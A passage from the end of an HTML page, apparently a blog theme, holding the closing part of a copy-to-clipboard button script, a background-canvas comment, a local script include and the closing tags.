        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


<script src="/js/dz.js"></script>



    
  </div>
</body>

</html>